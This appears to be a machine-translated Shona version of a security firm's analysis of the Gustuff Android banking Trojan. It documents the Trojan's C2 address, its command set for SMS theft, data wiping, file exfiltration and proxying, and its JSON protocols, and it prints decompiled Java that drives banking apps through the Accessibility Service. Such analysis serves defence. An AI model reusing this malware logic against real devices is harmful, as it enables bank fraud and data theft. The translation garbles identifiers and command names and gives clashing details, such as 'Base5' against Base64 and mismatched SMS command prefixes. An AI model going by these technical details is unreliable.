Rimwe zuva Boka-IB nezve chiitiko chefoni Android Trojan Gustuff. Inoshanda chete mumisika yepasirese, ichirwisa vatengi vemazana zana emabhangi makuru ekunze, vashandisi ve mobile 100 crypto wallet, pamwe nehombe e-commerce zviwanikwa. Asi mugadziri weGustuff iRussia-inotaura cybercriminal pasi pezita remadunhurirwa rokuti Bestoffer. Kusvika nguva pfupi yadarika, akarumbidza Trojan yake se "chigadzirwa chakakomba chevanhu vane ruzivo uye ruzivo."
Nyanzvi yekuongorora kodhi kuBoka-IB Ivan Pisarev mukutsvakurudza kwake, anotaura zvakadzama pamusoro pekuti Gustuff anoshanda sei uye kuti ndedzipi njodzi dzayo.
Gustuff arikuvhima ani?
Gustuff ndeyechizvarwa chitsva chemalware ine zvizere otomatiki mabasa. Sekureva kwemugadziri, iyo Trojan yave vhezheni itsva uye yakagadziridzwa yeAndyBot malware, iyo kubva muna Mbudzi 2017 yanga ichirwisa Android mafoni uye kuba mari kuburikidza ne phishing mafomu ewebhu anozvimisikidza semafambisirwo emafoni emabhangi anozivikanwa epasi rese uye masystem ekubhadhara. Bestoffer yakashuma kuti Gustuff Bot yekurenda mutengo waive $800 pamwedzi.
Ongororo yemuenzaniso weGustuff yakaratidza kuti iyo Trojan inogona kunanga vatengi vachishandisa nharembozha dzemabhangi makuru, akadai seBank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, pamwe ne crypto wallet. Bitcoin Wallet, BitPay, Cryptopay, Coinbase, nezvimwe.
Pakutanga yakagadzirwa seyekutanga kubhengi Trojan, mune yazvino vhezheni Gustuff yakawedzera zvakanyanya rondedzero yezvavangavavarira kurwisa. Kuwedzera kune Android zvikumbiro zvebhangi, makambani efintech uye crypto services, Gustuff yakanangana nevashandisi vemusika zvikumbiro, zvitoro zvepamhepo, masisitimu ekubhadhara uye vatumwa ipapo. Kunyanya, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut nevamwe.
Entry point: calculation for mass infection
Gustuff inoratidzwa ne "classic" vector yekupinda mu Android smartphones kuburikidza neSMS mailings ane zvinongedzo kune maAPK. Kana mudziyo weAroid ukatapukirwa neTrojan pakuraira kwesevha, Gustuff inogona kuenderera mberi nekupararira kuburikidza nedhatabhesi rekusangana kwefoni ine hutachiona kana kuburikidza neserver database. Kushanda kwaGustuff kwakagadzirirwa kutapukirwa kwevanhu vakawanda uye mari yakawanda yebhizimisi yevashandi vayo - ine yakasarudzika "auto-zadza" basa mune zviri pamutemo nhare dzebhengi zvikumbiro uye crypto wallet, iyo inokutendera iwe kukurumidzira uye kuyera kubiwa kwemari.
Ongororo yeTrojan yakaratidza kuti iyo autofill function yakaitwa mairi uchishandisa Accessibility Service, sevhisi yevanhu vakaremara. Gustuff haisi yekutanga Trojan kubudirira kunzvenga dziviriro kubva mukudyidzana nehwindo zvinhu zvemamwe maapplication uchishandisa iyi Android sevhisi. Nekudaro, kushandiswa kweAccessibility Service mukubatana nemota filler kuchiri kushoma.
Mushure mekudhawunirodha kunhare yemunhu akabatwa, Gustuff, achishandisa iyo Accessibility Service, inokwanisa kupindirana nemahwindo ezvimwe zvikumbiro (kubhengi, cryptocurrency, pamwe nekunyorera pamhepo kutenga, kutumira mameseji, nezvimwewo), kuita zviito zvinodiwa kune vanorwisa. . Semuenzaniso, pakuraira kweseva, Trojan inogona kudzvanya mabhatani uye kushandura kukosha kwemavara mameseji mumabhengi maapplication. Kushandisa iyo Accessibility Service mashandiro inobvumira iyo Trojan kunzvenga nzira dzekuchengetedza dzinoshandiswa nemabhanga kupikisa chizvarwa chekare cheTrojan, pamwe nekuchinja kwemutemo wekuchengetedza wakaitwa neGoogle mushanduro itsva dzeAndroid OS. Nokudaro, Gustuff "anoziva" kudzima kudzivirira kweGoogle Protect: maererano nemunyori, basa iri rinoshanda mu70% yematambudziko.
Gustuff inogona zvakare kuratidza fake PUSH zviziviso zvine zvidhori zvepamutemo nharembozha. Mushandisi anodzvanya pane PUSH chiziviso uye anoona phishing hwindo yakatorwa kubva pavhavha, kwaanopinda yakakumbirwa kadhi rebhangi kana crypto wallet data. Mune imwe mamiriro eGustuff, chikumbiro chakamiririra iyo PUSH chiziviso chakaratidzwa chinovhurwa. Muchiitiko ichi, iyo malware, pakuraira kubva kune sevha kuburikidza neAccessibility Service, inogona kuzadza mafomu emafomu ekubhengi chikumbiro chekutengesa kwehunyengeri.
Kuita kwaGustuff kunosanganisirawo kutumira ruzivo nezve mudziyo une hutachiona kuseva, kugona kuverenga / kutumira mameseji eSMS, kutumira zvikumbiro zveUSSD, kutanga SOCKS5 Proxy, kutevera chinongedzo, kutumira mafaera (kusanganisira mafoto scans emagwaro, skrini, mafoto) kune iyo server , gadzirisa zvakare mudziyo kune zvigadziriso zvefekitori.
Malware Analysis
Usati waisa application yakaipa, iyo Android OS inoratidza mushandisi hwindo rine runyoro rwekodzero dzakakumbirwa naGustuff:
Iyo application ichaiswa chete mushure mekugamuchira mvumo yemushandisi. Mushure mekutangisa application, iyo Trojan icharatidza mushandisi hwindo:
Mushure mezvo ichabvisa icon yayo.
Gustuff yakazara, maererano nemunyori, nemutakuri kubva kuFTT. Mushure mekutanga, iyo application nguva nenguva inobata CnC server kuti igamuchire mirairo. Mafaira akati wandei atakaongorora akashandisa IP kero sevhavha yekudzora 88.99.171[.]105 (zvino tichazvireva se <%CnC%>).
Mushure mekutangwa, chirongwa chinotanga kutumira mameseji kune server http://<%CnC%>/api/v1/get.php.
Mhinduro inotarisirwa kuve JSON mune inotevera fomati:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}Pese panowanikwa application, inotumira ruzivo nezve mudziyo une hutachiona. Iyo meseji fomati inoratidzwa pazasi. Zvinokosha kucherechedza kuti minda azere, zvimwezvo, Apps ΠΈ mvumo - sarudzo uye inotumirwa chete kana paine chikumbiro chekuraira kubva kuCnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Kuchengeta configuration data
Gustuff inochengetedza ruzivo rwakakosha mufaira rekuda. Zita refaira, pamwe chete nemazita emaparamita arimo, ndiwo mhedzisiro yekuverenga iyo MD5 sum kubva patambo. 15413090667214.6.1<%name%>kupi <%zita%> - kukosha kwezita rekutanga. Python dudziro yezita rechizvarwa basa:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
Mune zvinotevera tinozviratidzira se zitaJenareta(input).
Saka zita rekutanga refaira ndere: nameJenareta("API_SERVER_LIST"), ine maitiro ane mazita anotevera:
| Variable name | ukoshi |
|---|---|
| nameJenareta("API_SERVER_LIST") | Iine runyorwa rweCnC kero nenzira yehurongwa. |
| nameGenerator("API_SERVER_URL") | Iine kero yeCnC. |
| zitaJenareta("SMS_UPLOAD") | Mureza unoiswa nekukasira. Kana mureza waiswa, unotumira mameseji eSMS kuCnC. |
| ZitaJenareta("SMS_ROOT_NUMBER") | Nhamba yefoni iyo mameseji eSMS anogamuchirwa nemudziyo ane hutachiona anozotumirwa. Default is null. |
| ZitaJenareta("SMS_ROOT_NUMBER_RESEND") | Mureza unobviswa nekusarudzika. Kana yakaiswa, kana mudziyo une hutachiona ukagamuchira SMS, inotumirwa kumudzi nhamba. |
| zitaJenareta("DEFAULT_APP_SMS") | Mureza unobviswa nekusarudzika. Kana mureza uyu waiswa, application ichaita mameseji eSMS anouya. |
| nameJenareta("DEFAULT_ADMIN") | Mureza unobviswa nekusarudzika. Kana mureza wakaiswa, chikumbiro chine kodzero dzemaneja. |
| nameJenareta("DEFAULT_ACCESSIBILITY") | Mureza unobviswa nekusarudzika. Kana mureza waiswa, sevhisi inoshandisa Accessibility Service iri kushanda. |
| zitaJenareta("APPS_CONFIG") | Chinhu cheJSON chine runyoro rwezviito zvinofanirwa kuitwa kana chiitiko cheKusvikika chine chekuita nechero application chatanga. |
| zitaJenareta("APPS_INSTALLED") | Inochengeta runyoro rwemaapplication akaiswa pamudziyo. |
| ZitaJenareta("IS_FIST_RUN") | Mureza unoiswa patsva pakutanga kwekutanga. |
| zitaJenareta("UNIQUE_ID") | Ine chiziviso chakasiyana. Inogadzirwa kana bot yatangwa kekutanga. |
Module yekugadzirisa mirairo kubva kune server
Chishandiso chinochengeta kero dzeCnC maseva muchimiro cheiyo array encoded na Nheyo85 mitsetse. Rondedzero yemaseva eCnC inogona kushandurwa pawakagamuchira murairo wakakodzera, muchiitiko icho kero dzichachengetwa mufaira rekuda.
Mukupindura kuchikumbiro, sevha inotumira murairo kune chikumbiro. Izvo zvakakosha kucherechedza kuti mirairo uye paramita zvinounzwa muJSON fomati. Iyo application inogona kugadzirisa inotevera mirairo:
| chikwata | tsananguro |
|---|---|
| mberiStart | Tanga kutumira mameseji eSMS anogamuchirwa nemudziyo une hutachiona kuCnC server. |
| mberiStop | Rega kutumira mameseji eSMS anogamuchirwa nemudziyo une hutachiona kuCnC server. |
| ussdRun | Ita chikumbiro cheUSSD. Nhamba yaunoda kuita chikumbiro cheUSSD iri mundima yeJSON "nhamba". |
| sendSms | Tumira meseji yeSMS (kana zvichidikanwa, meseji "yakatsemurwa" kuita zvikamu). Separameter, murairo unotora chinhu cheJSON chine minda "ku" - nhamba yekuenda uye "muviri" - muviri weshoko. |
| sendSmsAb | Tumira mameseji eSMS (kana zvichidikanwa, meseji "yakatsemurwa" kuita zvikamu) kune wese munhu ari mune yekuonana runyorwa rwechishandiso chine hutachiona. Nguva iri pakati pekutumira mameseji masekonzi gumi. Mutumbi wemeseji uri mumunda weJSON "muviri" |
| sendSmsMass | Tumira mameseji eSMS (kana zvichidikanwa, meseji "yakatsemurwa" kuita zvikamu) kune vanobatika vanotsanangurwa mumirairo yemirairo. Nguva iri pakati pekutumira mameseji masekonzi gumi. Separameter, murairo unotora JSON array (iyo "sms" munda), zvinhu zvine minda "ku" - nhamba yekuenda uye "muviri" - muviri wemeseji. |
| changeServer | Murairo uyu unogona kutora kukosha nekiyi "url" separameter - ipapo bot inozoshandura kukosha kwezitaGenerator("SERVER_URL"), kana "array" - ipapo bot inonyora hurongwa kuti nameGenerator ("API_SERVER_LIST") Nekudaro, iyo application inoshandura kero yeCnC maseva. |
| adminNumber | Murairo wakagadzirirwa kushanda nenhamba yemidzi. Murairo unogamuchira chinhu cheJSON chine maparamita anotevera: "nhamba" - shandura zitaGenerator("ROOT_NUMBER") kune iyo yakagamuchirwa kukosha, "tumirazve" - ββshandura zitaGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" - tumira kuzitaGenerator("ROOT_NUMBER" ) uniqueID. |
| updateInfo | Tumira ruzivo nezve mudziyo une utachiona kuseva. |
| wipeData | Iwo murairo unoitirwa kudzima data yemushandisi. Zvichienderana nezita ripi iro application yakatangwa, ingave iyo data inodzimwa zvachose nemudziyo reboot (mushandisi wekutanga), kana data remushandisi chete rinodzimwa (mushandisi wechipiri). |
| socksStart | Tangisa iyo Proxy module. Kushanda kwemodule kunotsanangurwa muchikamu chakasiyana. |
| socksStop | Misa iyo Proxy module. |
| openLink | Tevedzera chinongedzo. Iyo link iri muJSON parameter pasi pe "url" kiyi. βandroid.intent.action.VIEWβ inoshandiswa kuvhura chinongedzo. |
| uploadAllSms | Tumira mameseji ese eSMS anogamuchirwa nemudziyo kune server. |
| uploadAllPhotos | Tumira mifananidzo kubva kune ine hutachiona kuenda kuURL. Iyo URL inouya separameter. |
| uploadFile | Tumira faira kuURL kubva kune ine hutachiona. Iyo URL inouya separameter. |
| uploadPhoneNumbers | Tumira nhamba dzenhare kubva kune yako yekufonera runyorwa kune server. Kana chinhu cheJSON chakakosha chine kiyi "ab" chikagamuchirwa separameter, chikumbiro chinogashira runyoro rwevanobatika kubva mubhuku renhare. Kana chinhu cheJSON chine kiyi "sms" chikagamuchirwa separameter, application inoverenga rondedzero yevanobatika kubva kune vanotumira mameseji eSMS. |
| changeArchive | Chishandiso chinodhawunirodha faira kubva kukero inouya separameter uchishandisa "url" kiyi. Iyo faira yakatorwa inochengetwa ine zita rekuti "archive.zip". Chishandiso chinozosunungura faira, sarudzo uchishandisa archive password "b5jXh37gxgHBrZhQ4j3D". Iwo mafaera asina kuvharwa anochengetwa mu [kunze kwekuchengetera]/hgps dhairekitori. Mune ino dhairekitori, iyo application inochengeta webhu fakes (inotsanangurwa pazasi). |
| zviito | Iwo murairo wakagadzirirwa kushanda neAction Service, iyo inotsanangurwa muchikamu chakasiyana. |
| bvunzo | Kusaita chinhu. |
| download | Iwo murairo unoitirwa kudhawunirodha faira kubva kune iri kure server uye chengeta kune iyo "Dhawunirodha" dhairekitori. Iyo URL uye zita refaira zvinouya separameter, minda muJSON parameter chinhu, zvichiteerana: "url" uye "fileName". |
| Bvisa | Inobvisa faira kubva ku "Downloads" dhairekitori. Zita refaira rinouya muJSON parameter ine "fileName" kiyi. Zita refaira rakajairwa ndiβtmp.apkβ. |
| ziviso | Ratidza chiziviso chine tsananguro uye zvinyorwa zvemusoro zvinotsanangurwa nemanejimendi server. |
Command Format ziviso:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}Iyo ziviso inogadzirwa nefaira iri kuferefetwa inotaridzika zvakafanana kune zviziviso zvinogadzirwa nechikumbiro chakatsanangurwa mumunda. App. Kana kukosha kwemunda openApp - Chokwadi, kana chiziviso chavhurwa, chishandiso chakatsanangurwa mumunda chinotangwa App. Kana kukosha kwemunda openApp - Nhema, saka:
- Hwindo re phishing rinovhura, izvo zviri mukati zvinotorwa kubva mudhairekitori <%external storage%>/hgps/<%filename%>
- Iwindo re phishing rinovhura, zviri mukati mazvo zvinotorwa kubva kune server <%url%>?id=<%Bot id%>&app=<%zita rekushandisa%>
- Hwindo rekubira rinovhura, rakavanza seGoogle Play Kadhi, nemukana wekuisa ruzivo rwekadhi.
Iyo application inotumira mhedzisiro yechero command kune <%CnC%>set_state.php sechinhu cheJSON mune inotevera fomati:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
ActionsService
Rondedzero yemirairo iyo maitiro ekushandisa anosanganisira chiito. Kana murairo wagamuchirwa, iyo command processing module inowana iyi sevhisi kuti iite iyo yakawedzera kuraira. Sevhisi inogamuchira chinhu cheJSON separameter. Iyo sevhisi inogona kuita inotevera mirairo:
1. PARAMS_ACTION - kana uchigamuchira murairo wakadaro, sevhisi inotanga kugamuchira kubva kuJSON parameter kukosha kweType key, iyo inogona kuva inotevera:
- serviceInfo - iyo subcommand inowana kukosha nekiyi kubva kuJSON parameter sanganisiraNotImportant. Kana mureza uri Chokwadi, chikumbiro chinoisa mureza FLAG_ISOLATED_PROCESS kune sevhisi uchishandisa iyo Accessibility Service. Nenzira iyi sevhisi ichatangwa mune imwe nzira.
- mudzi - gamuchira uye utumire kune server ruzivo nezve hwindo iro riri kutariswa izvozvi. Iyo application inowana ruzivo uchishandisa iyo AccessibilityNodeInfo kirasi.
- arun - kukumbira kodzero dzemutungamiri.
- kunonoka - misa iyo ActionsService yehuwandu hwemamilliseconds anotsanangurwa muparameter ye "data" kiyi.
- mahwindo - tumira runyoro rwemahwindo anoonekwa kumushandisi.
- install - isa iyo application pane ine hutachiona mudziyo. Iro zita reiyo archive package riri mu "fileName" kiyi. Iyo archive pachayo iri mu Dhawunirodha dhairekitori.
- zvepasi rose - iyo subcommand inoitirwa kufamba kubva pahwindo razvino:
- pane Quick Settings menyu
- kumashure
- kumba
- kune zviziviso
- kuhwindo remaapplication richangovhurwa
- Launch - vhura iyo application. Zita rekushandisa rinouya separameter nekiyi dhata.
- ruzha - shandura iyo inzwi modhi kuti inyarare.
- kiinura - inobatidza backlight yechidzitiro uye kiyibhodhi kupenya kuzere. Chishandiso chinoita chiito ichi uchishandisa WakeLock, ichitsanangura tambo [Application lable]:INFO se tag.
- mvumoOverlay - basa harina kuitwa (mhinduro yekuraira ndeye {"message":"Haitsigire"} kana {"message":"low sdk"})
- chiratidzo - basa harina kuitwa (mhinduro yekuraira ndeye {"message":"Haisi tsigiro"} kana {"message":"Low API"})
- Permissions - uyu murairo unofanirwa kukumbira mvumo yekushandisa. Zvisinei, basa remubvunzo harina kuitwa, saka murairo hauna maturo. Rondedzero yekodzero dzakakumbirwa inouya seJSON array ine "mvumo" kiyi. Standard list:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- yakazaruka - ratidza hwindo rekubira. Zvichienderana neparameter inouya kubva kune server, application inogona kuratidza inotevera phishing windows:
- Ratidza hwindo rekufishira rine zvinyorwa zvakanyorwa mufaira mudhairekitori <%external directory%>/hgps/<%param_filename%>. Mhedzisiro yekudyidzana kwemushandisi nehwindo ichatumirwa kune <%CnC%>/records.php
- Ratidza hwindo rehutsotsi rine zvinyorwa zvakafanoiswa kubva kukero <% url_param%>?id=<%bot_id%>&app=<%packagename%>. Mhedzisiro yekudyidzana kwemushandisi nehwindo ichatumirwa kune <%CnC%>/records.php
- Ratidza hwindo rekubira rakavharwa seGoogle Play Card.
- dyidzana - iwo murairo wakagadzirirwa kupindirana nehwindo zvinhu zvezvimwe zvinoshandiswa uchishandisa AcessibilityService. Sevhisi yakakosha yakaitwa muchirongwa chekudyidzana. Chishandiso chiri kuferefetwa chinogona kupindirana nemahwindo:
- Parizvino inoshanda. Muchiitiko ichi, parameter ine id kana zvinyorwa (zita) zvechinhu chaunoda kupindirana nacho.
- Inoonekwa kumushandisi panguva iyo murairo unoitwa. Iyo application inosarudza windows ne id.
Kugamuchira zvinhu AccessibilityNodeInfo Kune zvinhu zvewindow zvekufarira, iko kushandisa, zvichienderana nematanho, inogona kuita zvinotevera zviito:
- kutarisisa - isa tarisiro kuchinhu.
- tinya - tinya pane chinhu.
- actionId - ita chiito neID.
- setText - shandura zvinyorwa zvechinhu. Kushandura zvinyorwa zvinogoneka nenzira mbiri: ita chiito ACTION_SET_TEXT (kana iyo Android vhezheni yechinhu chine hutachiona idiki pane kana yakaenzana LOLLIPOP), kana nekuisa tambo pane clipboard uye nekuiisa muchinhu (yechinyakare shanduro). Uyu murairo unogona kushandiswa kushandura data mubhangi application.
2. PARAMS_ACTIONS - zvakafanana ne PARAMS_ACTION, chete JSON akatevedzana yemirairo inosvika.
Zvinoita sekuti vanhu vazhinji vachafarira kuti basa rekudyidzana nehwindo reimwe application rinotaridzika sei. Aya ndiwo mashandisirwo anoitwa basa iri muGustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Mavara ekutsiva basa:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Nekudaro, nekurongeka kwakaringana kwesevha yekudzora, Gustuff inokwanisa kuzadza zvinyorwa mubhangi application uye tinya mabhatani anodiwa kuti upedze kutengeserana. Iyo Trojan haitombodi kupinda muchishandiso-zvakakwana kutumira murairo kuratidza PUSH chiziviso uye wozovhura iyo yakamboiswa yekubhengi application. Mushandisi achazvisimbisa, mushure meizvozvo Gustuff achakwanisa kuzadza mota.
SMS yekugadzirisa meseji module
Chishandiso chinoisa chibatiso chechiitiko kuti mudziyo une hutachiona ugamuchire mameseji eSMS. Chishandiso chiri pasi pekudzidza chinogona kugamuchira mirairo kubva kune anoshanda, iyo inouya mumuviri weSMS meseji. Mirairo inouya muchimiro:
7=<%Base5 encoded command%>
Iyo application inotsvaga tambo mune ese anouya mameseji eSMS 7!5=, kana tambo yaonekwa, inobvisa tambo kubva kuBase64 pa offset 4 uye inoita murairo. Iyo mirairo yakafanana neiyo ine CnC. Mhedzisiro yekuuraya inotumirwa kune imwe nhamba iyo murairo wakabva. Mafomu emhinduro:
7*5=<%Base64 encode ye "result_code command"%>
Optionally, iyo application inogona kutumira ese akagamuchirwa mameseji kune Root nhamba. Kuti uite izvi, iyo Root nhamba inofanirwa kutsanangurwa mufaira rekuda uye meseji redirection mureza unofanirwa kusetwa. Meseji yeSMS inotumirwa kunhamba yeanorwisa mufomati:
<%Kubva kunhamba%> - <%Nguva, fomati: dd/MM/yyyy HH:mm:ss%> <%SMS body%>
Zvakare, sarudzo, chishandiso chinogona kutumira mameseji kuCnC. Iyo meseji yeSMS inotumirwa kuseva muJSON fomati:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}Kana mureza wakaiswa zitaJenareta("DEFAULT_APP_SMS") - Chishandiso chinomira kugadzirisa meseji yeSMS uye inobvisa runyorwa rwemameseji anouya.
Proxy module
Chikumbiro chiri pasi pechidzidzo chine Backconnect Proxy module (inozonzi Proxy module), iyo ine kirasi yakaparadzana inosanganisira static minda ine zvigadziriso. Configuration data inochengetwa mumuenzaniso nenzira yakajeka:
Zvese zviito zvinoitwa neProxy module zvakaiswa mumafaira. Kuti uite izvi, kushandiswa muKuchengetedza Kwekunze kunogadzira dhairekitori inonzi "logs" (iyo ProxyConfigClass.logsDir munda mukirasi yekugadzirisa), umo mafaira egigi akachengetwa. Kupinda kunoitika mumafaira ane mazita:
- main.txt - basa rekirasi rinonzi CommandServer rakapinzwa mufaira iri. Mune zvinotevera, kuisa tambo str mufaira iyi inozonzi mainLog(str).
- chikamu-<%id%>.txt -iyi faira inochengetedza data regi rakabatana neimwe proxy chikamu. Mune zvinotevera, kutema tambo str kune iyi faira inozonzi sessionLog (str).
- server.txt -iyi faira inoshandiswa kunyora data rese rakanyorwa kune mafaera akatsanangurwa pamusoro.
Log data format:
<%Date%> [Thread[<%thread id%>], id[]]: log-string
Kunze kunoitika panguva yekushanda kweProxy module inoiswawo kufaira. Kuti uite izvi, iyo application inogadzira chinhu cheJSON mune inotevera fomati:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Zvadaro inoishandura kuita tambo inomiririra uye inoinyora.
Iyo Proxy module inotangwa mushure mekugamuchira murairo unoenderana. Kana murairo wekuvhura iyo Proxy module wagamuchirwa, application inotanga sevhisi inodaidzwa MainService, iyo ine basa rekugadzirisa kushanda kweProxy module - kutanga nekuimisa.
Matanho ekutanga sevhisi:
1. Inotanga timer inomhanya kamwe paminiti uye inotarisa chiitiko cheProxy module. Kana iyo module isiri kushanda, inotanga iyo.
Uyewo kana chiitiko chacho chakatangwa android.net.conn.CONNECTIVITY_CHANGE Iyo Proxy module inotangwa.
2. Iyo application inogadzira wake-lock ine parameter PARTIAL_WAKE_LOCK ndokumubata. Izvi zvinodzivirira mudziyo weCPU kuti urege kupinda mukurara mode.
3. Inotangisa kirasi yekugadzirisa yekuraira yeProxy module, kutanga kutema mutsara mainLog("start server") ΠΈ
Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]
apo proxy_cnc, command_port uye proxy_port - ma paramita akawanikwa kubva kuProxy server kumisikidza.
The command processing class inonzi CommandConnection. Pakarepo mushure mekutanga, inoita zvinotevera zviito:
4. Inobatanidza ne ProxyConfigClass.host: ProxyConfigClass.commandPort uye inotumira data nezve mudziyo une hutachiona ipapo muJSON fomati:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Kupi:
- id - identifier, inoedza kuwana kukosha ne "id" munda kubva kuShared Preference file inonzi "x". Kana kukosha uku kukatadza kuwanikwa, kunoburitsa hutsva. Nekudaro, iyo Proxy module ine yayo identifier, iyo inogadzirwa zvakafanana neBot ID.
- imei - IMEI yemuchina. Kana kukanganisa kwakaitika panguva yekutora kukosha, meseji yemhosho inonyorwa pachinzvimbo chendima iyi.
- imsi - International Mobile Subscriber Identity yemudziyo. Kana kukanganisa kwakaitika panguva yekutora kukosha, meseji yemhosho inonyorwa pachinzvimbo chendima iyi.
- modhi - Zita rekupedzisira-mushandisi-rinoonekwa rekupedzisira chigadzirwa.
- mugadziri - Mugadziri wechigadzirwa/hardware (Build.MANUFACTURER).
- androidVersion - tambo iri mufomati "<%release_version%> (<%os_version%>),<%sdk_version%>"
- nyika - ikozvino nzvimbo yechigadzirwa.
- partnerId itambo isina chinhu.
- packageName - pasuru zita.
- networkType - mhando yeazvino network yekubatanidza (semuenzaniso: "WIFI", "MOBILE"). Kana pane kukanganisa, inodzosera pasina.
- hasGsmSupport - chokwadi - kana foni ichitsigira GSM, neimwe nzira nhema.
- simReady - SIM kadhi mamiriro.
- simCountry - ISO yenyika kodhi (yakavakirwa paSIM kadhi mupi).
- networkOperator - zita remushandisi. Kana kukanganisa kwakaitika panguva yekutora kukosha, meseji yemhosho inonyorwa pachinzvimbo chendima iyi.
- simOperator - Zita reMupi Webasa (SPN). Kana kukanganisa kwakaitika panguva yekutora kukosha, meseji yemhosho inonyorwa pachinzvimbo chendima iyi.
- vhezheni - iyi ndima inochengetwa mukirasi yegadziriso; kune dzakaedzwa vhezheni dzebhoti yaive yakaenzana ne "1.6".
5. Inochinjira kumodhi yekumirira mirairo kubva kuseva. Mirairo kubva kuseva inouya nenzira:
- 0 offset - kuraira
- 1 yekubvisa - chikamuId
- 2 kureba - kureba
- 4 offset - data
Kana murairo wasvika, iyo application logs:
mainLog("Musoro {sessionId<%id%>], mhando[<%command%>], kureba[<%length%>] }")
Iyo inotevera mirairo kubva kune server inogoneka:
| zita | murayiro | Data | tsananguro |
|---|---|---|---|
| connectionId | 0 | Connection ID | Gadzira chinongedzo chitsva |
| SLEEP | 3 | nguva | Imbomira iyo Proxy module |
| PING_PONG | 4 | - | Tumira PONG meseji |
Mharidzo yePONG ine 4 bytes uye inotaridzika seizvi: 0x04000000.
Kana iyo yekubatanidzaId yekuraira yagamuchirwa (kugadzira chinongedzo chitsva) CommandConnection inogadzira muenzaniso wekirasi ProxyConnection.
